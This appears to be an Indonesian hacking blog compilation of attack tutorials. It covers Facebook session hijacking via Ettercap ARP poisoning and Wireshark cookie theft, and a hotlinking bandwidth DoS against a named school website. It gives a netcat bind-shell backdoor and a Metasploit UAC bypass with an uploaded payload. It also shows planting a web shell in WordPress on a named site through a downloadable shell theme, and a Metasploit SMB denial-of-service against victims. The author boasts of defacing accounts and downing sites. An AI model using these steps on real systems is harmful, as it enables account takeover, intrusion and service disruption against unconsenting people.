Kali ini serangan yg kita tujukan ialah mereka yg sedang mengakses akun Facebook.
mengapa Facebook..???
saya mengambil judul Facebook agar bisa menjawab pertanyaan anda yg mungkin sampai saat ini belum berhasil mencuri account facebook krn terbentur saat mengatur susunan cookies yg menurut saya susah-susah gampang lah.
Tapi tenang saja, pada tulisan saya kali ini saya akan membuatnya lebih rinci dan mudah untuk kalian ingat, mengingat kalian tidak perlu menyusun cookies yang hanya bisa membuat kepala kalian pusing.
Equipment :
Ettercap = melakukan serangan "Man-in-the-middle attack" Arp Poisoning
Wireshark = melakukan Analys Troubleshooting di sebuah jaringan.
GreaseMonkey (addons mozilla) = Menyusun halaman web dengan menggunakan potongan-potongan kecil JavaScript.
Cookies Injector = Menyuntikkan string cookie yang ditangkap di paket Wireshark.
[Addons mozilla firefox]
Add and download lalu Install --> greasemonkey & cookie-injection
greasemonkey
Cookies Injector
pertama buka ettercap pada terminal dengan megetikkan
ettercap -G
Maka akan muncul Ettercapnya.
Kemudian klik Tab Sniff => Unified Sniffing
seterusnya pada kolom Network Interface = Masukan Interface yg kalian gunakan, disini saya memakai Wlan0
kemudian lakukan tahap scanning untuk melihat IP Address yg terhubung dalam jaringan.
klik Tab HOSTS dan pilih Scann For Hosts dan tunggu hingga selesai.
kemudian klik Tab HOSTS dan pilih Hosts List untuk melihat host yg lagi terkoneksi
OK. Selanjutnya kita memilih IP korban.
Pada Hosts List diatas saya memilih :
Gateway = 192.168.1.1 Add to Target 1, dan
IP 192.168.1.10 Add to Target 2
Q : Bagaimana jika Target lebih dari satu ???
A : Simple, saya beri contoh seperti ini : misalkan ada 4 Hosts list, yaitu :
192.168.1.1 (Gateway)
192.168.1.2 (Ip korban)
192.168.1.4 (Ip korban)
192.168.1.8 (Ip korban)
caranya adalah :
saya masukkan gateway 192.168.1.1 Add to Target 1,
dan masukan IP korban 192.168.1.2 Add to Target 2,
kemudian ulangi masukkan gateway 192.168.1.1 Add to Target 1,
dan masukan IP korban 192.168.1.3 / 192.168.1.4 Add to Target 2
begitu seterusnya :)
oke saya anggap tidak ada masalah dan kita lanjut ke tahap berikutnya =))
Klik Tab MITM => Arp Poisoning kemudian beri cek list Sniff Remote Connections . klik OK
selanjutnya untuk menjalankan Sniffing, Klik Tab START dan Pilih Start Sniffing.
lalu setelah selesai sniffing sekarang waktunya buka wireshark
di terminal ketikkan
wireshark
maka akan muncul Wireshark-nya.
selanjutnya ubah settingan dengan menekan Ctrl+K atau Capture ==> Capture Options
dan pilih interface kalian
kemudian Beri cheklist pada bagian
- enable network name resolution
kemudian klik start.
next, ketik http.cookies pada colom Filter (ENTER)
tunggu hingga muncul target yang mengakses facebook.
NOTE : ada banyak warna bermunculunan untuk capture yg terekam namun tidak semua bisa menerima upaya agar kita dapat mengakses facebook melalui cookienya. pilih Capture facebook yang berwarna hitam agar cookie bekerja dengan semestinya :)
oke, selanjutnya tentukan target kemudian klik kanan ==>> Copy ==>> Bytes ==>> Printable Text Only
maka kita mendapatkan cookies korban.
selanjutnya buka browser Mozilla-Firefox kalian dan langsung mengakses http://www.facebook.com.
kemudian tekan tombol Alt+C untuk menjalankan Cookies Injector. maka akan muncul kolom Wireshark Cookie Dump dan kemudian pastekan cookies yg sudah kita ambil lalu klik OK.
Tahap akhir lakukan refresh pada halaman facebook. makan akan membawa kita ke page home facebook si korban.
SUCCESS...!!!
=)) dan saya hanya meninggalkan kenang-kenangan di facebook korban dengan mengupdate status =)) 
artikel lengkapnya ada disini:
http://www.google.co.id/search?q=ddos&ie...=firefox-a
biasanya, ddos dilakukan dengan menggunakan bot2 ddoser yang banyak dan mematikan. but, kali ini kita tidak menggunakan bot sebagai media, tetapi menggunakan manusia sebagai senjata ddoser kita.
ddos kali ini, sedikit berbeda. yang akan kita lakukan adalah mematikan website dengan menghabiskan bandwidthnya. Caranya?
Suatu website akan cepat habis bandwitdth nya bila website tersebut di load sangat sering. ntah itu secara langsung (dengan membuka web itu) ataupun secara tidak langsung (mengambil gambar/file dari web itu melalu web lain).
nah, itulah konsep kita. bingung? langsung aja ya
http://smam1nganjuk.sch.id/ <<< sasaran
karena rentan terhadap denial of service
sasaran ini, mempunya header image yang bagus. yang perlu kita lakukan adalah ngeload img tersebut dari site lain.terutama site yang besar, misal forum2 besar kelas dunia seperti kaskus.com
caranya klik kanan header web tersebut lalu copy image location
dan buat treadh baru dengan judul dan isi yang menarik perhatian. nah letakan gambar dari site sasaran di tread ini.
dan pastekan gambar yang telah di copy tadi pada treads
forum besar, di kunjungi ribuan orang tiap harinya. nah jika orang2 tersebut membaca tread kita, maka orang tersebut membantu kita untuk load image dari site sasaran. Hal ini berarti membantu mempercepat habisnya bandwidth sasaran. Semakin banyak yang buka, semakin cepat habis, semakin cepat pula sasaran down karena kebahisan bandwidth.
teknik ini secara tidak sengaja q temukan karena iseng. dan site sasaran gak sampai 3 hari down.huehuehue
Backdoor seringkali digunakan untuk masuk ke dalam sistem tanpa sepengetahuan administrator, namun hal tersebut bisa dilakukan jika penyusup pernah masuk kedalam sistem tersebut dengan hak akses root.
Pemberian backdoor ini dilakukan untuk mempermudah mereka memasuki sistem tersebut jika jalan yang telah dibuat dengan eksploit telah ditutup oleh administrator.
Jadi, tujuan dari backdoor bukan untuk mendapatkan previlege root, tetapi untuk mendapatkan kembali previlege yang pernah diperoleh.
jadi initinya kita tidak bisa masuk lewat pintu system jalan satu satunya adalah lewat pintu belakang
ok langsung saja disini kita menggunakan netcat bukan netcut yaa . . .
percobaan ini menggunakan 2 pc
1.windows
2.linux ( backtrack )
kalo yang belum punya netcat bisa download di http://www.mediafire.com/?2l8cqoqcs9f7doj untuk windows ekstrak dulu nc.exe dan taruh di directory C:
dan linux backtrack sudah tersedia nc.exe nya
1. kita akan mencoba menjadikan windows menjadi listen/server (pendengar)
disini ip address windows ( server 192.168.1.15)
buka cmd dan masuk directory C:
lalu ketikkan perintah
nc.exe -lvp 1234 -e cmd.exe1234 = port yang kita buka untuk listener
-e xxx = adalah program yang akan di akses jika connect ke server
sekarang coba si client (linux) mencoba untuk menghubungi ( mengconnectkan ke server ) dengan port yang telah ditentukan si server
ketikkan perintah
nc ipadddressserver port
nc 192.168.1.59 1234
dan suksess masuk ke cmd pada server
dan berikut screenshot jika ada client yang connect ke server backdoor
Disini saya harap kalian sudah masuk sesi meterpreter
dan apa yang kita lakukan setelah dapat sesi meterpreter
banyak cara yang kita lakukan ketika kita berada pada sesi meterpreter ini
hmmm...yup kita akan mengupload backdoor agar kita bisa masuk ke pc korban lagi tanpa mengexploitnya
tapi kendala masih saja ada yaitu tidak bisa upload backdoor kita
dengan keterangan error access denied atau kita ditolak masuk ke system tersebut
DISINI SAYA HARAP KALIAN SUDAH MENDAPATKAN SESSION METERPRETER 1
ok langsung saja kita mencoba masuk systemnya apabila belum di patch tu windows nya
disini saya harap sudah ada pada meterpreter
lalu ketikkan perintah
getsystem
untuk masuk kesistem
dan coba upload kan lagi backdoor kalian
wow ternyata sukses
lalu kita coba test pada windows 7 yang sudah di patch
DAN JIKA WINDOWS 7 SUDAH DI PATCH alias korban memakai windows 7 sp1
maka ketika kita mau mendapatkan system dengan getsystem maka access denied
dan muncul pesan error pada windows korban
hmmm ternyata bener bener sudah di patch
disini kita harus sudah masuk meterpreter dulu sebelum membypass nya
dan cara untuk mengakalinya dengan menggunakan tehnik bypass.exe yang ada pada folder /opt/metasploit/msf3/data/post
buka lagi msfconsole
lalu buat exploit multi handler
use exploit/multi/handler
exploit
lalu bikin payload multi handler dan simpan dengan nama 4444.exe pada desktop
buka terminal baru masukkan perintah
cd /opt/metasploit/msf3/data/post
disana kita kana melihat bypass nya disini korban menggunakan system 32 bit jadinya saya memilih x86
dan sekarang copy bypass nya pada desktop dan rename nya disini korban menggunakan 32bit dan saya rename bypassnya disini saya rename jadi trokanzboy.exe
cp bypassuac-x86.exe /root/Desktop/trojanzboy.exe
nah hasilnya kita punya 2 file di desktop
1. Payload multi handler yang kita buat tadi
2. bypass yang barusan kita copy
dengan perintah pwd
ternyata exploit kita yang dieksekusi sebelumnya ada di D:
sekarang mulailah kita upload bypass.exe yang telah kita rename tadi di desktop
upload /root/Desktop/trojanzboy.exe D:\
lalu upload juga payload yang telah kita buat sebelumnya
upload /root/Desktop/4444.exe D:\
sekarang kita masuk cmd korban untuk mengesekusinya menggunkan perintah
shell
lalu eksekusi payload dibawah bypass dengan perintah
trojanzboy.exe elevate /c D:\4444.exe
dan beralihlah pada console kedua (msfconsole yang baru dibuat tadi) dan coba untuk dapatkan systemnya dengan perintah
getsystem
woowwww work
:>
Kali ini saya akan tunjukkan cara memasang shell pada web yang berbasis wordpress selepas setelah dulu saya share cara pasang shell pada joomla. Ok simak baik - baik
cara pertama memanfaatkan install theme
lanjut untuk menanam shell atau bakcDoor di wordpress :) Masuk kehalaman login Wordpress, kali ini
download theme shell nya --> https://dl.dropboxusercontent.com/s/86z2jjxa7boouq0/example.zip?token_hash=AAEeeTu66xtroMqfgsuh1OzWFtEeckIxqQ8ltunIbrFa3Q&dl=1
kebetulan saya mempunyai target :D >>http://www.senterpompa.com
download theme shell nya --> https://dl.dropboxusercontent.com/s/86z2jjxa7boouq0/example.zip?token_hash=AAEeeTu66xtroMqfgsuh1OzWFtEeckIxqQ8ltunIbrFa3Q&dl=1
kebetulan saya mempunyai target :D >>http://www.senterpompa.com
Setelah login, masuk kebagian Appearance >> Themes >> Install Themes >> Install
lalu upload theme yang sudah kalian download tadi 
kalo punya saya di sini masbroo >>http://www.senterpompa.com/wp-content/themes/example/index.php
dan sukses shel telah terupload
CARA ke 2 dengan mengedit themes yang aktif
ok langsung saja disini saya asumsikan kalian sudah masuk pada admin panel
lalu langsung menuju ke Apperance > editor > pilih dibagian kanan layar pilih 404.php
lalu rubah script original 404.php dengan script shell backdoor kamu danupdate file
lalu dimana letak shell kita
gampang liat di address bar kalian disini korban menggunakan template wootique
maka shell kita berada pada http://www.senterpompa.com/wp-content/themes/wootique/404.php
Dan sukses shell telah tertanam pada web korban
Denial Of Service atau sering disingkat dengan DOS adalah salah satu bentuk serangan dalam dunia networking yang bertujuan mematikan pelayanan dari komputer atau jaringan komputer yang diserang
ok pertama kita buka terminal dan mengetikkan perintah
msfconsole
untuk membuka metasploit framework
setelah itu kta cara serangan dos dengan mengetikkan perintah
search dos
exploit yang kita gunakan adalah auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
langsung saja kita mengexploit nya
ketikkan perintahnya
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
set srvhost 192.168.1.47
exploit
dan kirim kan link yang telah diberikan metasploit pada korban
disini korban menggunakan windows 7 dengan firewall = on
dan korban mengeksekusi pada browser \\192.168.1.47\Shared\Anything
maka korban akan hang dan macet tidak bisa berbuat apa-apa
prosesor korban akan begitu terasa panas karna serangan ini
kalau dibiarkan bisa berakibat fatal maka jalan satu-satunya laptop
harus di restart secara paksa dengan tombol power
wkwkwkwkwk... ...
